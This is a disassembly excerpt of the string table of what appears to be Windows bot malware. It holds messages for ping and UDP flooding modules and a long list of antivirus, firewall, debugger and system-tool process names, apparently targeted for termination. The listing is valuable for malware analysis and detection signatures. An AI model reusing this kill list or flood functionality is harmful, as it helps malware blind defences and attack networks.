aFlushdnsArpCac db '[FLUSHDNS]: ARP cache is empty.',0 ; DATA XREF: sub_406B55:loc_406BA9�o
aFlushdnsErrorG db '[FLUSHDNS]: Error getting ARP cache: <%d>.',0
; DATA XREF: sub_406B55+44�o
align 4
aPingFinishedSe db '[PING]: Finished sending pings to %s.',0 ; DATA XREF: sub_406CD9+138�o
align 4
aPingErrorSendi db '[PING]: Error sending pings to %s.',0 ; DATA XREF: sub_406CD9+6C�o
align 4
aUdpFinishedSen db '[UDP]: Finished sending packets to %s.',0 ; DATA XREF: sub_406E62+1CA�o
align 10h
aUdpErrorSendin db '[UDP]: Error sending pings to %s.',0 ; DATA XREF: sub_406E62+8C�o
align 4
aHass_exe db 'hass.exe',0 ; DATA XREF: .data:0042AE34�o
align 10h
aWinmp_exe db 'winmp.exe',0 ; DATA XREF: .data:0042AE30�o
align 4
aBling_exe db 'bling.exe',0 ; DATA XREF: .data:0042AE2C�o
align 4
aWuamgrd_exe db 'wuamgrd.exe',0 ; DATA XREF: .data:0042AE28�o
aScguard_exe db 'scguard.exe',0 ; DATA XREF: .data:0042AE24�o
aWinssv_exe db 'winssv.exe',0 ; DATA XREF: .data:0042AE20�o
align 4
aWruaclt_exe db 'WRUACLT.EXE',0 ; DATA XREF: .data:0042AE1C�o
aWuacrlt_exe db 'WUACRLT.EXE',0 ; DATA XREF: .data:0042AE18�o
aWuanclt_exe db 'WUANCLT.EXE',0 ; DATA XREF: .data:0042AE14�o
aMsconfig_exe db 'MsConfiG.exe',0 ; DATA XREF: .data:0042AE10�o
align 10h
aI11r54n4_exe db 'i11r54n4.exe',0 ; DATA XREF: .data:0042AE0C�o
align 10h
aIrun4_exe db 'irun4.exe',0 ; DATA XREF: .data:0042AE08�o
align 4
aD3dupdate_exe db 'd3dupdate.exe',0 ; DATA XREF: .data:0042AE04�o
align 4
aRate_exe db 'rate.exe',0 ; DATA XREF: .data:0042AE00�o
align 4
aSsate_exe db 'ssate.exe',0 ; DATA XREF: .data:0042ADFC�o
align 4
aWinsys_exe db 'winsys.exe',0 ; DATA XREF: .data:0042ADF8�o
align 10h
aWinupd_exe db 'winupd.exe',0 ; DATA XREF: .data:0042ADF4�o
align 4
aSysmonxp_exe db 'SysMonXP.exe',0 ; DATA XREF: .data:0042ADF0�o
align 4
aBbeagle_exe db 'bbeagle.exe',0 ; DATA XREF: .data:0042ADEC�o
aPenis32_exe db 'Penis32.exe',0 ; DATA XREF: .data:0042ADE8�o
aMscvb32_exe db 'mscvb32.exe',0 ; DATA XREF: .data:0042ADE4�o
aSysinfo_exe db 'sysinfo.exe',0 ; DATA XREF: .data:0042ADE0�o
aPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: .data:0042ADDC�o
align 10h
aFAgobot_exe db 'F-AGOBOT.EXE',0 ; DATA XREF: .data:0042ADD8�o
align 10h
aHijackthis_exe db 'HIJACKTHIS.EXE',0 ; DATA XREF: .data:0042ADD4�o
align 10h
a_avpm_exe db '_AVPM.EXE',0 ; DATA XREF: .data:0042ADD0�o
align 4
a_avpcc_exe db '_AVPCC.EXE',0 ; DATA XREF: .data:0042ADCC�o
align 4
a_avp32_exe db '_AVP32.EXE',0 ; DATA XREF: .data:0042ADC8�o
align 4
aZonealarm_exe db 'ZONEALARM.EXE',0 ; DATA XREF: .data:0042ADC4�o
align 4
aZonalm2601_exe db 'ZONALM2601.EXE',0 ; DATA XREF: .data:0042ADC0�o
align 4
aZatutor_exe db 'ZATUTOR.EXE',0 ; DATA XREF: .data:0042ADBC�o
aZapsetup3001_e db 'ZAPSETUP3001.EXE',0 ; DATA XREF: .data:0042ADB8�o
align 4
aZapro_exe db 'ZAPRO.EXE',0 ; DATA XREF: .data:0042ADB4�o
align 10h
aXpf202en_exe db 'XPF202EN.EXE',0 ; DATA XREF: .data:0042ADB0�o
align 10h
aWyvernworksfir db 'WYVERNWORKSFIREWALL.EXE',0 ; DATA XREF: .data:0042ADAC�o
aWupdt_exe db 'WUPDT.EXE',0 ; DATA XREF: .data:0042ADA8�o
align 4
aWupdater_exe db 'WUPDATER.EXE',0 ; DATA XREF: .data:0042ADA4�o
align 4
aWsbgate_exe db 'WSBGATE.EXE',0 ; DATA XREF: .data:0042ADA0�o
aWrctrl_exe db 'WRCTRL.EXE',0 ; DATA XREF: .data:0042AD9C�o
align 4
aWradmin_exe db 'WRADMIN.EXE',0 ; DATA XREF: .data:0042AD98�o
aWnt_exe db 'WNT.EXE',0 ; DATA XREF: .data:0042AD94�o
aWnad_exe db 'WNAD.EXE',0 ; DATA XREF: .data:0042AD90�o
align 4
aWkufind_exe db 'WKUFIND.EXE',0 ; DATA XREF: .data:0042AD8C�o
aWinupdate_exe db 'WINUPDATE.EXE',0 ; DATA XREF: .data:0042AD88�o
align 4
aWintsk32_exe db 'WINTSK32.EXE',0 ; DATA XREF: .data:0042AD84�o
align 4
aWinstart001_ex db 'WINSTART001.EXE',0 ; DATA XREF: .data:0042AD80�o
aWinstart_exe db 'WINSTART.EXE',0 ; DATA XREF: .data:0042AD7C�o
align 4
aWinssk32_exe db 'WINSSK32.EXE',0 ; DATA XREF: .data:0042AD78�o
align 4
aWinservn_exe db 'WINSERVN.EXE',0 ; DATA XREF: .data:0042AD74�o
align 4
aWinrecon_exe db 'WINRECON.EXE',0 ; DATA XREF: .data:0042AD70�o
align 4
aWinppr32_exe db 'WINPPR32.EXE',0 ; DATA XREF: .data:0042AD6C�o
align 4
aWinnet_exe db 'WINNET.EXE',0 ; DATA XREF: .data:0042AD68�o
align 4
aWinmain_exe db 'WINMAIN.EXE',0 ; DATA XREF: .data:0042AD64�o
aWinlogin_exe db 'WINLOGIN.EXE',0 ; DATA XREF: .data:0042AD60�o
align 10h
aWininitx_exe db 'WININITX.EXE',0 ; DATA XREF: .data:0042AD5C�o
align 10h
aWininit_exe db 'WININIT.EXE',0 ; DATA XREF: .data:0042AD58�o
aWininetd_exe db 'WININETD.EXE',0 ; DATA XREF: .data:0042AD54�o
align 4
aWindows_exe db 'WINDOWS.EXE',0 ; DATA XREF: .data:0042AD50�o
aWindow_exe db 'WINDOW.EXE',0 ; DATA XREF: .data:0042AD4C�o
align 4
aWinactive_exe db 'WINACTIVE.EXE',0 ; DATA XREF: .data:0042AD48�o
align 4
aWin32us_exe db 'WIN32US.EXE',0 ; DATA XREF: .data:0042AD44�o
aWin32_exe db 'WIN32.EXE',0 ; DATA XREF: .data:0042AD40�o
align 4
aWinBugsfix_exe db 'WIN-BUGSFIX.EXE',0 ; DATA XREF: .data:0042AD3C�o
aWimmun32_exe db 'WIMMUN32.EXE',0 ; DATA XREF: .data:0042AD38�o
align 4
aWhoswatchingme db 'WHOSWATCHINGME.EXE',0 ; DATA XREF: .data:0042AD34�o
align 10h
aWgfe95_exe db 'WGFE95.EXE',0 ; DATA XREF: .data:0042AD30�o
align 4
aWfindv32_exe db 'WFINDV32.EXE',0 ; DATA XREF: .data:0042AD2C�o
align 4
aWebtrap_exe db 'WEBTRAP.EXE',0 ; DATA XREF: .data:0042AD28�o
aWebscanx_exe db 'WEBSCANX.EXE',0 ; DATA XREF: .data:0042AD24�o
align 4
aWebdav_exe db 'WEBDAV.EXE',0 ; DATA XREF: .data:0042AD20�o
align 4
aWatchdog_exe db 'WATCHDOG.EXE',0 ; DATA XREF: .data:0042AD1C�o
align 4
aW9x_exe db 'W9X.EXE',0 ; DATA XREF: .data:0042AD18�o
aW32dsm89_exe db 'W32DSM89.EXE',0 ; DATA XREF: .data:0042AD14�o
align 4
aVswinperse_exe db 'VSWINPERSE.EXE',0 ; DATA XREF: .data:0042AD10�o
align 4
aVswinntse_exe db 'VSWINNTSE.EXE',0 ; DATA XREF: .data:0042AD0C�o
align 4
aVswin9xe_exe db 'VSWIN9XE.EXE',0 ; DATA XREF: .data:0042AD08�o
align 4
aVsstat_exe db 'VSSTAT.EXE',0 ; DATA XREF: .data:0042AD04�o
align 4
aVsmon_exe db 'VSMON.EXE',0 ; DATA XREF: .data:0042AD00�o
align 4
aVsmain_exe db 'VSMAIN.EXE',0 ; DATA XREF: .data:0042ACFC�o
align 10h
aVsisetup_exe db 'VSISETUP.EXE',0 ; DATA XREF: .data:0042ACF8�o
align 10h
aVshwin32_exe db 'VSHWIN32.EXE',0 ; DATA XREF: .data:0042ACF4�o
align 10h
aVsecomr_exe db 'VSECOMR.EXE',0 ; DATA XREF: .data:0042ACF0�o
aVsched_exe db 'VSCHED.EXE',0 ; DATA XREF: .data:0042ACEC�o
align 4
aVscenu6_02d30_ db 'VSCENU6.02D30.EXE',0 ; DATA XREF: .data:0042ACE8�o
align 4
aVscan40_exe db 'VSCAN40.EXE',0 ; DATA XREF: .data:0042ACE4�o
aVptray_exe db 'VPTRAY.EXE',0 ; DATA XREF: .data:0042ACE0�o
align 4
aVpfw30s_exe db 'VPFW30S.EXE',0 ; DATA XREF: .data:0042ACDC�o
aVpc42_exe db 'VPC42.EXE',0 ; DATA XREF: .data:0042ACD8�o
align 4
aVpc32_exe db 'VPC32.EXE',0 ; DATA XREF: .data:0042ACD4�o
align 4
aVnpc3000_exe db 'VNPC3000.EXE',0 ; DATA XREF: .data:0042ACD0�o
align 4
aVnlan300_exe db 'VNLAN300.EXE',0 ; DATA XREF: .data:0042ACCC�o
align 4
aVirusmdpersona db 'VIRUSMDPERSONALFIREWALL.EXE',0 ; DATA XREF: .data:0042ACC8�o
aVirHelp_exe db 'VIR-HELP.EXE',0 ; DATA XREF: .data:0042ACC4�o
align 4
aVfsetup_exe db 'VFSETUP.EXE',0 ; DATA XREF: .data:0042ACC0�o
aVettray_exe db 'VETTRAY.EXE',0 ; DATA XREF: .data:0042ACBC�o
aVet95_exe db 'VET95.EXE',0 ; DATA XREF: .data:0042ACB8�o
align 4
aVet32_exe db 'VET32.EXE',0 ; DATA XREF: .data:0042ACB4�o
align 4
aVcsetup_exe db 'VCSETUP.EXE',0 ; DATA XREF: .data:0042ACB0�o
aVbwinntw_exe db 'VBWINNTW.EXE',0 ; DATA XREF: .data:0042ACAC�o
align 10h
aVbwin9x_exe db 'VBWIN9X.EXE',0 ; DATA XREF: .data:0042ACA8�o
aVbust_exe db 'VBUST.EXE',0 ; DATA XREF: .data:0042ACA4�o
align 4
aVbcons_exe db 'VBCONS.EXE',0 ; DATA XREF: .data:0042ACA0�o
align 4
aVbcmserv_exe db 'VBCMSERV.EXE',0 ; DATA XREF: .data:0042AC9C�o
align 4
aUtpost_exe db 'UTPOST.EXE',0 ; DATA XREF: .data:0042AC98�o
align 10h
aUpgrad_exe db 'UPGRAD.EXE',0 ; DATA XREF: .data:0042AC94�o
align 4
aUpdate_exe db 'UPDATE.EXE',0 ; DATA XREF: .data:0042AC8C�o
; .data:0042AC90�o
align 4
aUpdat_exe db 'UPDAT.EXE',0 ; DATA XREF: .data:0042AC88�o
align 4
aUndoboot_exe db 'UNDOBOOT.EXE',0 ; DATA XREF: .data:0042AC84�o
align 4
aTvtmd_exe db 'TVTMD.EXE',0 ; DATA XREF: .data:0042AC80�o
align 10h
aTvmd_exe db 'TVMD.EXE',0 ; DATA XREF: .data:0042AC7C�o
align 4
aTsadbot_exe db 'TSADBOT.EXE',0 ; DATA XREF: .data:0042AC78�o
aTrojantrap3_ex db 'TROJANTRAP3.EXE',0 ; DATA XREF: .data:0042AC74�o
aTrjsetup_exe db 'TRJSETUP.EXE',0 ; DATA XREF: .data:0042AC70�o
align 4
aTrjscan_exe db 'TRJSCAN.EXE',0 ; DATA XREF: .data:0042AC6C�o
aTrickler_exe db 'TRICKLER.EXE',0 ; DATA XREF: .data:0042AC68�o
align 4
aTracert_exe db 'TRACERT.EXE',0 ; DATA XREF: .data:0042AC64�o
aTitaninxp_exe db 'TITANINXP.EXE',0 ; DATA XREF: .data:0042AC60�o
align 10h
aTitanin_exe db 'TITANIN.EXE',0 ; DATA XREF: .data:0042AC5C�o
aTgbob_exe db 'TGBOB.EXE',0 ; DATA XREF: .data:0042AC58�o
align 4
aTfak5_exe db 'TFAK5.EXE',0 ; DATA XREF: .data:0042AC54�o
align 4
aTfak_exe db 'TFAK.EXE',0 ; DATA XREF: .data:0042AC50�o
align 10h
aTeekids_exe db 'TEEKIDS.EXE',0 ; DATA XREF: .data:0042AC4C�o
aTds2Nt_exe db 'TDS2-NT.EXE',0 ; DATA XREF: .data:0042AC48�o
aTds298_exe db 'TDS2-98.EXE',0 ; DATA XREF: .data:0042AC44�o
aTds3_exe db 'TDS-3.EXE',0 ; DATA XREF: .data:0042AC40�o
align 10h
aTcm_exe db 'TCM.EXE',0 ; DATA XREF: .data:0042AC3C�o
aTca_exe db 'TCA.EXE',0 ; DATA XREF: .data:0042AC38�o
aTc_exe db 'TC.EXE',0 ; DATA XREF: .data:0042AC34�o
align 4
aTbscan_exe db 'TBSCAN.EXE',0 ; DATA XREF: .data:0042AC30�o
align 4
aTaumon_exe db 'TAUMON.EXE',0 ; DATA XREF: .data:0042AC2C�o
align 10h
aTaskmon_exe db 'TASKMON.EXE',0 ; DATA XREF: .data:0042AC28�o
aTaskmo_exe db 'TASKMO.EXE',0 ; DATA XREF: .data:0042AC24�o
align 4
aTaskmg_exe db 'TASKMG.EXE',0 ; DATA XREF: .data:0042AC20�o
align 4
aSysupd_exe db 'SYSUPD.EXE',0 ; DATA XREF: .data:0042AC1C�o
align 10h
aSystem32_exe db 'SYSTEM32.EXE',0 ; DATA XREF: .data:0042AC18�o
align 10h
aSystem_exe db 'SYSTEM.EXE',0 ; DATA XREF: .data:0042AC14�o
align 4
aSysedit_exe db 'SYSEDIT.EXE',0 ; DATA XREF: .data:0042AC10�o
aSymtray_exe db 'SYMTRAY.EXE',0 ; DATA XREF: .data:0042AC0C�o
aSymproxysvc_ex db 'SYMPROXYSVC.EXE',0 ; DATA XREF: .data:0042AC08�o
aSweepnet_sweep db 'SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE',0 ; DATA XREF: .data:0042AC04�o
align 4
aSweep95_exe db 'SWEEP95.EXE',0 ; DATA XREF: .data:0042AC00�o
aUpd32_exe db 'UPD32.EXE',0 ; DATA XREF: .data:0042ABFC�o
align 10h
aSvshost32_exe db 'SVSHOST32.EXE',0 ; DATA XREF: .data:0042ABF8�o
align 10h
aSvshost_exe db 'SVSHOST.EXE',0 ; DATA XREF: .data:0042ABF4�o
aSvchosts_exe db 'SVCHOSTS.EXE',0 ; DATA XREF: .data:0042ABF0�o
align 4
aSvchostc_exe db 'SVCHOSTC.EXE',0 ; DATA XREF: .data:0042ABEC�o
align 4
aSvc_exe db 'SVC.EXE',0 ; DATA XREF: .data:0042ABE8�o
aSupporter5_exe db 'SUPPORTER5.EXE',0 ; DATA XREF: .data:0042ABE4�o
align 4
aSupport_exe db 'SUPPORT.EXE',0 ; DATA XREF: .data:0042ABE0�o
aSupftrl_exe db 'SUPFTRL.EXE',0 ; DATA XREF: .data:0042ABDC�o
aStcloader_exe db 'STCLOADER.EXE',0 ; DATA XREF: .data:0042ABD8�o
align 4
aStart_exe db 'START.EXE',0 ; DATA XREF: .data:0042ABD4�o
align 4
aSt2_exe db 'ST2.EXE',0 ; DATA XREF: .data:0042ABD0�o
aSsg_4104_exe db 'SSG_4104.EXE',0 ; DATA XREF: .data:0042ABCC�o
align 10h
aSsgrate_exe db 'SSGRATE.EXE',0 ; DATA XREF: .data:0042ABC8�o
aSs3edit_exe db 'SS3EDIT.EXE',0 ; DATA XREF: .data:0042ABC4�o
aSrng_exe db 'SRNG.EXE',0 ; DATA XREF: .data:0042ABC0�o
align 4
aSrexe_exe db 'SREXE.EXE',0 ; DATA XREF: .data:0042ABBC�o
align 10h
aSpyxx_exe db 'SPYXX.EXE',0 ; DATA XREF: .data:0042ABB8�o
align 4
aSpoolsv32_exe db 'SPOOLSV32.EXE',0 ; DATA XREF: .data:0042ABB4�o
align 4
aSpoolcv_exe db 'SPOOLCV.EXE',0 ; DATA XREF: .data:0042ABB0�o
aSpoler_exe db 'SPOLER.EXE',0 ; DATA XREF: .data:0042ABAC�o
align 4
aSphinx_exe db 'SPHINX.EXE',0 ; DATA XREF: .data:0042ABA8�o
align 10h
aSpf_exe db 'SPF.EXE',0 ; DATA XREF: .data:0042ABA4�o
aSperm_exe db 'SPERM.EXE',0 ; DATA XREF: .data:0042ABA0�o
align 4
aSofi_exe db 'SOFI.EXE',0 ; DATA XREF: .data:0042AB9C�o
align 10h
aSoap_exe db 'SOAP.EXE',0 ; DATA XREF: .data:0042AB98�o
align 4
aSmss32_exe db 'SMSS32.EXE',0 ; DATA XREF: .data:0042AB94�o
align 4
aSms_exe db 'SMS.EXE',0 ; DATA XREF: .data:0042AB90�o
aSmc_exe db 'SMC.EXE',0 ; DATA XREF: .data:0042AB8C�o
aShowbehind_exe db 'SHOWBEHIND.EXE',0 ; DATA XREF: .data:0042AB88�o
align 4
aShn_exe db 'SHN.EXE',0 ; DATA XREF: .data:0042AB84�o
aShellspyinstal db 'SHELLSPYINSTALL.EXE',0 ; DATA XREF: .data:0042AB80�o
aSh_exe db 'SH.EXE',0 ; DATA XREF: .data:0042AB7C�o
align 4
aSgssfw32_exe db 'SGSSFW32.EXE',0 ; DATA XREF: .data:0042AB78�o
align 4
aSfc_exe db 'SFC.EXE',0 ; DATA XREF: .data:0042AB74�o
aSetup_flowprot db 'SETUP_FLOWPROTECTOR_US.EXE',0 ; DATA XREF: .data:0042AB70�o
align 10h
aSetupvameeval_ db 'SETUPVAMEEVAL.EXE',0 ; DATA XREF: .data:0042AB6C�o
align 4
aServlces_exe db 'SERVLCES.EXE',0 ; DATA XREF: .data:0042AB68�o
align 4
aServlce_exe db 'SERVLCE.EXE',0 ; DATA XREF: .data:0042AB64�o
aService_exe db 'SERVICE.EXE',0 ; DATA XREF: .data:0042AB60�o
aServ95_exe db 'SERV95.EXE',0 ; DATA XREF: .data:0042AB5C�o
align 4
aSd_exe db 'SD.EXE',0 ; DATA XREF: .data:0042AB58�o
align 10h
aScvhost_exe db 'SCVHOST.EXE',0 ; DATA XREF: .data:0042AB54�o
aScrsvr_exe db 'SCRSVR.EXE',0 ; DATA XREF: .data:0042AB50�o
align 4
aScrscan_exe db 'SCRSCAN.EXE',0 ; DATA XREF: .data:0042AB4C�o
aScanpm_exe db 'SCANPM.EXE',0 ; DATA XREF: .data:0042AB48�o
align 10h
aScan95_exe db 'SCAN95.EXE',0 ; DATA XREF: .data:0042AB44�o
align 4
aScan32_exe db 'SCAN32.EXE',0 ; DATA XREF: .data:0042AB40�o
align 4
aScam32_exe db 'SCAM32.EXE',0 ; DATA XREF: .data:0042AB3C�o
align 4
aSc_exe db 'SC.EXE',0 ; DATA XREF: .data:0042AB38�o
align 4
aSbserv_exe db 'SBSERV.EXE',0 ; DATA XREF: .data:0042AB34�o
align 4
aSavenow_exe db 'SAVENOW.EXE',0 ; DATA XREF: .data:0042AB30�o
aSave_exe db 'SAVE.EXE',0 ; DATA XREF: .data:0042AB2C�o
align 10h
aSahagent_exe db 'SAHAGENT.EXE',0 ; DATA XREF: .data:0042AB28�o
align 10h
aSafeweb_exe db 'SAFEWEB.EXE',0 ; DATA XREF: .data:0042AB24�o
aRuxdll32_exe db 'RUXDLL32.EXE',0 ; DATA XREF: .data:0042AB20�o
align 4
aRundll16_exe db 'RUNDLL16.EXE',0 ; DATA XREF: .data:0042AB1C�o
align 4
aRundll_exe db 'RUNDLL.EXE',0 ; DATA XREF: .data:0042AB18�o
align 4
aRun32dll_exe db 'RUN32DLL.EXE',0 ; DATA XREF: .data:0042AB14�o
align 4
aRulaunch_exe db 'RULAUNCH.EXE',0 ; DATA XREF: .data:0042AB10�o
align 4
aRtvscn95_exe db 'RTVSCN95.EXE',0 ; DATA XREF: .data:0042AB0C�o
align 4
aRtvscan_exe db 'RTVSCAN.EXE',0 ; DATA XREF: .data:0042AB08�o
aRshell_exe db 'RSHELL.EXE',0 ; DATA XREF: .data:0042AB04�o
align 10h
aRrguard_exe db 'RRGUARD.EXE',0 ; DATA XREF: .data:0042AB00�o
aRescue32_exe db 'RESCUE32.EXE',0 ; DATA XREF: .data:0042AAFC�o
align 4
aRescue_exe db 'RESCUE.EXE',0 ; DATA XREF: .data:0042AAF8�o
align 4
aRegedt32_exe db 'REGEDT32.EXE',0 ; DATA XREF: .data:0042AAF4�o
align 4
aRegedit_exe db 'REGEDIT.EXE',0 ; DATA XREF: .data:0042AAF0�o
aReged_exe db 'REGED.EXE',0 ; DATA XREF: .data:0042AAEC�o
align 10h
aRealmon_exe db 'REALMON.EXE',0 ; DATA XREF: .data:0042AAE8�o
aRcsync_exe db 'RCSYNC.EXE',0 ; DATA XREF: .data:0042AAE4�o
align 4
aRb32_exe db 'RB32.EXE',0 ; DATA XREF: .data:0042AAE0�o
align 4
aRay_exe db 'RAY.EXE',0 ; DATA XREF: .data:0042AADC�o
aRav8win32eng_e db 'RAV8WIN32ENG.EXE',0 ; DATA XREF: .data:0042AAD8�o
align 10h
aRav7win_exe db 'RAV7WIN.EXE',0 ; DATA XREF: .data:0042AAD4�o
aRav7_exe db 'RAV7.EXE',0 ; DATA XREF: .data:0042AAD0�o
align 4
aRapapp_exe db 'RAPAPP.EXE',0 ; DATA XREF: .data:0042AACC�o
align 4
aQserver_exe db 'QSERVER.EXE',0 ; DATA XREF: .data:0042AAC8�o
aQconsole_exe db 'QCONSOLE.EXE',0 ; DATA XREF: .data:0042AAC4�o
align 10h
aPview95_exe db 'PVIEW95.EXE',0 ; DATA XREF: .data:0042AAC0�o
aPussy_exe db 'PUSSY.EXE',0 ; DATA XREF: .data:0042AABC�o
align 4
aPurge_exe db 'PURGE.EXE',0 ; DATA XREF: .data:0042AAB8�o
align 4
aPspf_exe db 'PSPF.EXE',0 ; DATA XREF: .data:0042AAB4�o
align 10h
aProtectx_exe db 'PROTECTX.EXE',0 ; DATA XREF: .data:0042AAB0�o
align 10h
aProport_exe db 'PROPORT.EXE',0 ; DATA XREF: .data:0042AAAC�o
aProgramauditor db 'PROGRAMAUDITOR.EXE',0 ; DATA XREF: .data:0042AAA8�o
align 10h
aProcexplorerv1 db 'PROCEXPLORERV1.0.EXE',0 ; DATA XREF: .data:0042AAA4�o
align 4
aProcessmonitor db 'PROCESSMONITOR.EXE',0 ; DATA XREF: .data:0042AAA0�o
align 4
aProcdump_exe db 'PROCDUMP.EXE',0 ; DATA XREF: .data:0042AA9C�o
align 4
aPrmvr_exe db 'PRMVR.EXE',0 ; DATA XREF: .data:0042AA98�o
align 4
aPrmt_exe db 'PRMT.EXE',0 ; DATA XREF: .data:0042AA94�o
align 4
aPrizesurfer_ex db 'PRIZESURFER.EXE',0 ; DATA XREF: .data:0042AA90�o
aPpvstop_exe db 'PPVSTOP.EXE',0 ; DATA XREF: .data:0042AA8C�o
aPptbc_exe db 'PPTBC.EXE',0 ; DATA XREF: .data:0042AA88�o
align 4
aPpinupdt_exe db 'PPINUPDT.EXE',0 ; DATA XREF: .data:0042AA84�o
align 4
aPowerscan_exe db 'POWERSCAN.EXE',0 ; DATA XREF: .data:0042AA80�o
align 4
aPortmonitor_ex db 'PORTMONITOR.EXE',0 ; DATA XREF: .data:0042AA7C�o
aPortdetective_ db 'PORTDETECTIVE.EXE',0 ; DATA XREF: .data:0042AA78�o
align 10h
aPopscan_exe db 'POPSCAN.EXE',0 ; DATA XREF: .data:0042AA74�o
aPoproxy_exe db 'POPROXY.EXE',0 ; DATA XREF: .data:0042AA70�o
aPop3trap_exe db 'POP3TRAP.EXE',0 ; DATA XREF: .data:0042AA6C�o
align 4
aPlatin_exe db 'PLATIN.EXE',0 ; DATA XREF: .data:0042AA68�o
align 4
aPingscan_exe db 'PINGSCAN.EXE',0 ; DATA XREF: .data:0042AA64�o
align 4
aPgmonitr_exe db 'PGMONITR.EXE',0 ; DATA XREF: .data:0042AA60�o
align 4
aPfwadmin_exe db 'PFWADMIN.EXE',0 ; DATA XREF: .data:0042AA5C�o
align 4
aPf2_exe db 'PF2.EXE',0 ; DATA XREF: .data:0042AA58�o
aPerswf_exe db 'PERSWF.EXE',0 ; DATA XREF: .data:0042AA54�o
align 4
aPersfw_exe db 'PERSFW.EXE',0 ; DATA XREF: .data:0042AA50�o
align 4
aPeriscope_exe db 'PERISCOPE.EXE',0 ; DATA XREF: .data:0042AA4C�o
align 4
aPenis_exe db 'PENIS.EXE',0 ; DATA XREF: .data:0042AA48�o
align 10h
aPdsetup_exe db 'PDSETUP.EXE',0 ; DATA XREF: .data:0042AA44�o
aPcscan_exe db 'PCSCAN.EXE',0 ; DATA XREF: .data:0042AA40�o
align 4
aPcip10117_0_ex db 'PCIP10117_0.EXE',0 ; DATA XREF: .data:0042AA3C�o
aPcfwallicon_ex db 'PCFWALLICON.EXE',0 ; DATA XREF: .data:0042AA38�o
aPcdsetup_exe db 'PCDSETUP.EXE',0 ; DATA XREF: .data:0042AA34�o
align 4
aPccwin98_exe db 'PCCWIN98.EXE',0 ; DATA XREF: .data:0042AA30�o
align 4
aPccwin97_exe db 'PCCWIN97.EXE',0 ; DATA XREF: .data:0042AA2C�o
align 4
aPccntmon_exe db 'PCCNTMON.EXE',0 ; DATA XREF: .data:0042AA28�o
align 4
aPcciomon_exe db 'PCCIOMON.EXE',0 ; DATA XREF: .data:0042AA24�o
align 4
aPcc2k_76_1436_ db 'PCC2K_76_1436.EXE',0 ; DATA XREF: .data:0042AA20�o
align 4
aPcc2002s902_ex db 'PCC2002S902.EXE',0 ; DATA XREF: .data:0042AA1C�o
aPavw_exe db 'PAVW.EXE',0 ; DATA XREF: .data:0042AA18�o
align 4
aPavsched_exe db 'PAVSCHED.EXE',0 ; DATA XREF: .data:0042AA14�o
align 4
aPavproxy_exe db 'PAVPROXY.EXE',0 ; DATA XREF: .data:0042AA10�o
align 4
aPavcl_exe db 'PAVCL.EXE',0 ; DATA XREF: .data:0042AA0C�o
align 4
aPatch_exe db 'PATCH.EXE',0 ; DATA XREF: .data:0042AA08�o
align 10h
aPanixk_exe db 'PANIXK.EXE',0 ; DATA XREF: .data:0042AA04�o
align 4
aPadmin_exe db 'PADMIN.EXE',0 ; DATA XREF: .data:0042AA00�o
align 4
aOutpostproinst db 'OUTPOSTPROINSTALL.EXE',0 ; DATA XREF: .data:0042A9FC�o
align 10h
aOutpostinstall db 'OUTPOSTINSTALL.EXE',0 ; DATA XREF: .data:0042A9F8�o
align 4
aOutpost_exe db 'OUTPOST.EXE',0 ; DATA XREF: .data:0042A9F0�o
; .data:0042A9F4�o
aOtfix_exe db 'OTFIX.EXE',0 ; DATA XREF: .data:0042A9EC�o
align 4
aOstronet_exe db 'OSTRONET.EXE',0 ; DATA XREF: .data:0042A9E8�o
align 4
aOptimize_exe db 'OPTIMIZE.EXE',0 ; DATA XREF: .data:0042A9E4�o
align 4
aOnsrvr_exe db 'ONSRVR.EXE',0 ; DATA XREF: .data:0042A9E0�o
align 4
aOllydbg_exe db 'OLLYDBG.EXE',0 ; DATA XREF: .data:0042A9DC�o
aNwtool16_exe db 'NWTOOL16.EXE',0 ; DATA XREF: .data:0042A9D8�o
align 4
aNwservice_exe db 'NWSERVICE.EXE',0 ; DATA XREF: .data:0042A9D4�o
align 4
aNwinst4_exe db 'NWINST4.EXE',0 ; DATA XREF: .data:0042A9D0�o
aNvsvc32_exe db 'NVSVC32.EXE',0 ; DATA XREF: .data:0042A9CC�o
aNvc95_exe db 'NVC95.EXE',0 ; DATA XREF: .data:0042A9C8�o
align 4
aNvarch16_exe db 'NVARCH16.EXE',0 ; DATA XREF: .data:0042A9C4�o
align 4
aNupgrade_exe db 'NUPGRADE.EXE',0 ; DATA XREF: .data:0042A9BC�o
; .data:0042A9C0�o
align 4
aNui_exe db 'NUI.EXE',0 ; DATA XREF: .data:0042A9B8�o
aNtxconfig_exe db 'NTXconfig.EXE',0 ; DATA XREF: .data:0042A9B4�o
align 10h
aNtvdm_exe db 'NTVDM.EXE',0 ; DATA XREF: .data:0042A9B0�o
align 4
aNtrtscan_exe db 'NTRTSCAN.EXE',0 ; DATA XREF: .data:0042A9AC�o
align 4
aNt_exe db 'NT.EXE',0 ; DATA XREF: .data:0042A9A8�o
align 4
aNsupdate_exe db 'NSUPDATE.EXE',0 ; DATA XREF: .data:0042A9A4�o
align 4
aNstask32_exe db 'NSTASK32.EXE',0 ; DATA XREF: .data:0042A9A0�o
align 4
aNssys32_exe db 'NSSYS32.EXE',0 ; DATA XREF: .data:0042A99C�o
aNsched32_exe db 'NSCHED32.EXE',0 ; DATA XREF: .data:0042A998�o
align 10h
aNpssvc_exe db 'NPSSVC.EXE',0 ; DATA XREF: .data:0042A994�o
align 4
aNpscheck_exe db 'NPSCHECK.EXE',0 ; DATA XREF: .data:0042A990�o
align 4
aNprotect_exe db 'NPROTECT.EXE',0 ; DATA XREF: .data:0042A98C�o
align 4
aNpfmessenger_e db 'NPFMESSENGER.EXE',0 ; DATA XREF: .data:0042A988�o
align 10h
aNpf40_tw_98_nt db 'NPF40_TW_98_NT_ME_2K.EXE',0 ; DATA XREF: .data:0042A984�o
align 4
aNotstart_exe db 'NOTSTART.EXE',0 ; DATA XREF: .data:0042A980�o
align 4
aNorton_interne db 'NORTON_INTERNET_SECU_3.0_407.EXE',0 ; DATA XREF: .data:0042A97C�o
align 10h
aNormist_exe db 'NORMIST.EXE',0 ; DATA XREF: .data:0042A978�o
aNod32_exe db 'NOD32.EXE',0 ; DATA XREF: .data:0042A974�o
align 4
aNmain_exe db 'NMAIN.EXE',0 ; DATA XREF: .data:0042A970�o
align 4
aNisum_exe db 'NISUM.EXE',0 ; DATA XREF: .data:0042A96C�o
align 10h
aNisserv_exe db 'NISSERV.EXE',0 ; DATA XREF: .data:0042A968�o
